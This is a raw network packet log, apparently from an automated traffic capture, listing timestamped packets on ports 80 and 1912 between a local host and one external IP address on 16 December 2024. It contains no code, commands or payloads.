                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.780241013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.780325890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.780369997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.781044006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.781121016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.781166077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.781915903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.782006979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.782788992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.782829046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.782843113 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.782861948 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.783679962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.783798933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.783835888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.784563065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.784719944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.785481930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.785543919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.785592079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.786303997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.786350965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.786401987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.787208080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.787254095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.787285089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.787326097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.788053036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.788110971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.788786888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.788921118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.789052010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.789777994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.789830923 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.789901018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.790678024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.790721893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.790793896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.790829897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.791546106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.791747093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.791795969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.792505026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.792571068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.792614937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.793303013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.793397903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.793440104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.794177055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.794301987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.794344902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.795053959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.795097113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.795142889 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.796011925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.796025038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.796080112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.796842098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.796938896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.796984911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.797768116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.797888994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.797950029 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.798566103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.798685074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.799452066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.799506903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.799561024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.800340891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.800390005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.800462961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.800806046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.801186085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.801516056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.802078009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.802129984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.802160978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.802983999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.803031921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.803031921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.803813934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.803864002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.803971052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.804008007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.804693937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.804815054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.804857016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.805588007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.805695057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.806458950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.806510925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.806574106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.806811094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.807291985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.855902910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.931284904 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.953820944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.953855991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.953977108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.954051018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.954099894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.954180002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.954910040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.955043077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.955818892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.955863953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.955919027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.956707954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.956748009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.956809998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.957058907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.957571030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.957617998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.957660913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.958410978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.958523035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.958566904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.959378958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.959536076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.959579945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.960164070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.960314989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.960370064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.961054087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.961436033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.961479902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.961954117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.961993933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.962815046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.962831974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.962888002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.962933064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.963670969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.963809967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.963850021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.964555979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.964673996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.964719057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.965523958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.965584040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.965627909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.966310978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.966406107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.966450930 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.967186928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.967338085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.967381954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.968058109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.968172073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.968791008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.968926907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.969033957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.969815969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.969854116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.969909906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.970261097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.970753908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.970832109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.970869064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.971586943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.971709013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.971797943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.972456932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.972624063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.972657919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.973344088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.973491907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.973535061 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.974220991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.974272966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.974323988 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.975061893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.975203037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.975243092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.975945950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.976066113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.976129055 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.976814985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.976898909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.976941109 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.977886915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.977935076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.977976084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.978621960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.978677034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.979247093 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.979255915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.979463100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.979574919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.979618073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.980345011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.980457067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.980504036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.981215000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.981287956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.981549025 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.982090950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.982203007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.982244968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.982974052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.983053923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.983095884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.983911991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.983993053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.984034061 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.984723091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.984880924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.984929085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.985604048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.985699892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.985737085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.986458063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.986567020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.986604929 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.987337112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.987457037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.987495899 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.988219023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.988394976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.988435030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.989100933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.989303112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.989340067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.989985943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.990076065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.990113974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.990865946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.990971088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.991008043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.991759062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.991874933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.991910934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.992611885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.992731094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.992770910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.993468046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.993586063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.993623018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.994364023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.994477987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.994515896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.995208025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.995253086 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.995268106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.098998070 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.099015951 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.099030018 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.099107981 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.099136114 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.099188089 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.115092993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.267543077 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.387362003 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.387449980 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.387528896 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.507214069 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.537365913 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.590228081 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.636827946 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.756916046 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.756933928 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.756944895 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.756963968 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757076979 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757096052 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757164955 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757208109 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757352114 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757369995 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757467031 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757486105 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757575989 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757642031 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757765055 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757795095 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.757925987 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.201009989 CET191249729185.81.68.147192.168.2.10
